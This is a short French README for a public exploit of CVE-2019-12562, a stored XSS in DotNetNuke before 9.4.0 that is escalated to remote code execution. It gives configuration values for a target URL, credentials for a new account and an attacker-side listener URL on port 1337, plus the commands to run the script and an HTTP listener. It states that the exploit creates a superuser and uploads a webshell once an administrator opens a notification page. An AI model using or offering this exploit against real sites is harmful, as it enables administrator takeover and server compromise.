
Cross-Site Scripting stocké dans DotNetNuke (DNN) version antérieure à 9.4.0 | XSS vers RCE
CVE-2019-12562 Le Cross-Site Scripting stocké dans DotNetNuke (DNN) version antérieure à 9.4.0 permet à des attaquants distants de stocker et d'intégrer le script malveillant dans la page de notification d'administration. L'exploit pourrait être utilisé pour effectuer toute action avec les privilèges d'administrateur, comme gérer le contenu, ajouter des utilisateurs, téléverser des backdoors sur le serveur, etc. L'exploitation réussit lorsqu'un administrateur visite une page de notification contenant le cross-site scripting stocké.
TARGET_URL = "http://targetdomain/DotNetNuke"
USERNAME = "MAYASEVEN" # At least five characters long
PASSWORD = "P@ssw0rd" # At least 0 non-alphanumeric characters, At least 7 characters
EMAIL = "[email protected]" # Change email to any you want
# A web server for listening an event
LISTEN_URL = "http://yourdomain.com:1337"
python3 CVE-2019-12562.py
python -m SimpleHTTPServer 1337
Cet exploit créera un superutilisateur et téléversera un webshell sur le serveur cible
Condition de l'exploit : L'exploitation réussit lorsqu'un administrateur visite une page de notification.
En savoir plus : https://mayaseven.com/cve-2019-12562-stored-cross-site-scripting-in-dotnetnuke-dnn-version-v9-3-2/ Référence CVE : https://www.cvedetails.com/cve/CVE-2019-12562/